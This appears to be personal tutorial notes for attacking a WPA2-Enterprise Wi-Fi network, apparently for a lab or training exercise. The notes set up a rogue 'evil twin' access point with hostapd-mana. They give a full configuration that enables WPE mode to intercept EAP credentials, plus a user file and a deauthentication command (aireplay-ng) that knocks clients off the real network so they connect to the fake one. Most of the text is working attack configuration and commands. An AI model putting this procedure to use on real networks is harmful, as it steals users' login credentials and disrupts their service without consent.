#wpa-enterprise #wpa #mgt #wpa2 #host-apd
Useful site (VERY useful) — https://github.com/sensepost/hostapd-mana/wiki
Youtube tutorial: https://youtu.be/tLuUezovvEs
Steps:
- run iwconfig, to discover the interfaces and status
2. Put an interface into listening mode as shown in image below
3. run airodump to see what going on within the vicinity
Note: AUTH= MGT, this means it is enterprise management.
4. Focus this airodump on channel 6 (and lets leave it running)
Note — we can see STATION is probing for the ESSID.
5. We now have the ESSID so lets get working on creating a conf file using mana.
- You only need to edit certain parts of the configuration file, which can be found at: https://github.com/sensepost/hostapd-mana/wiki/Creating-PSK-or-EAP-Networks
- The basic configuation file will be as follows - host.conf
interface=wlan1
ssid=TigerSecurities
channel=6
hw_mode=g
Note: We have changed the interface to WLAN1, as this was available to us from initial iwconfig command
- in addition, we need to add the following to the file:
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
eapol_key_index_workaround=0
ca_cert=ca.pem
server_cert=server.pem
private_key=server.key
private_key_passwd=
dh_file=dhparam.pem
mana_wpe=1 : enables WPE mode for EAP credentials interception
mana_eapsuccess=1 : enable EAP success messages
Note: Assuming you have all your certificates at hand to use. Also note that you will need to give full path to where the certs are kept. So edit ca_cert, server_cert, private_key,private_key_passwd.
6. We now need to create a hostapd.eap_user file, as follows:
* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]
7. Now start the network — host-apd-mana host.conf
8. Switch to your airodump (which should still be running ) and you will see a second network.
9. Now the fun part, launch a deauth attack on the real network using aireplay-ng -0 100 -a bssid wlan0
Note: you may need to add — ignore-negative-one if an error is shown
10. Now if you switch back to where you run the host.conf from, you will see the client connect to your network, which displays the credentials.